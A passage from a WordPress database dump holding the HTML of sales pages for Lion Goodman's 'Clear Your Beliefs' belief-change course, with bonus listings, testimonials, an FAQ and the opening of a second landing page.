but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:29:40', '2014-06-17 23:29:40', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(954, 2, '2014-06-17 18:33:08', '2014-06-17 23:33:08', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	